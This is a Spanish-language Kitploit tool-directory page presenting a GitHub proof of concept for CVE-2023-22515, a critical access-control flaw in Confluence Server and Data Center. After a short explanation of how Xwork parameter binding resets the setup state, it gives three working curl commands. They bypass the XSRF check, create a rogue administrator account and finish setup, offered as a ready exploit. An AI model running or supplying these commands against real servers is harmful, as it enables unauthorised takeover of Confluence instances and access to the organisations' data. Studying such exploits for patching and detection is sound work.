Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-22515-POC — PoC para CVE-2023-22515 | Kitploit
Herramientas/GitHubGitHub/j3seer/cve-2023-22515-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónRed Teaming
GitHubj3seer/cve-2023-22515-poc

CVE-2023-22515-POC

PoC para CVE-2023-22515

Ver Repositorio
82hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-22515

CVE-2023-22515, una vulnerabilidad crítica que afecta a las instancias locales de Confluence Server y Confluence Data Center, una vulnerabilidad de control de acceso roto. Attlassian ha proporcionado una puntuación base CVSS de 10.0

Exploit

Breve explicación:

1- Debido a cómo los interceptores Xwork analizan los parámetros /test.action?one=a equivale a setOne()='a'; alternativamente, /test.action?one.two=a equivale a getOne().setTwo()="a"

2- Los endpoints /setup/* incluyen una llamada @ParameterSafe que nos permite usar set y get como en /setup/setupdb.action?dbConfigInfo.databaseType=postgresql; sin embargo, dado que los endpoints /setup/* están bloqueados porque la configuración está completa, se puede usar /server-info.action

3- Encuentra el método set para la configuración completa => getBootstrapStatusProvider().getApplicationConfig().setSetupComplete(false);

4- Usa el encabezado "X-Atlassian-Token" para eludir XSRF

root@kitploit:~
curl http://localhost/server-info.action\?bootstrapStatusProvider.applicationConfig.setupComplete\=false\; 

curl -X POST -H "X-Atlassian-Token: no-check" -d "username=haxor&fullName=leet&[email protected]&password=leet&confirm=leet&setup-next-button=Next" http://localhost/setup/setupadministrator.action\; 

curl -X POST -H "X-Atlassian-Token: no-check" http://localhost/setup/finishsetup.action

Referencias

DESCARGO DE RESPONSABILIDAD: El exploit no fue descubierto ni creado por mí, el crédito va para los artículos a continuación

https://attackerkb.com/topics/Q5f0ItSzw5/cve-2023-22515/rapid7-analysis

https://blog.s1r1us.ninja/research/brokenconflu

Descargar herramienta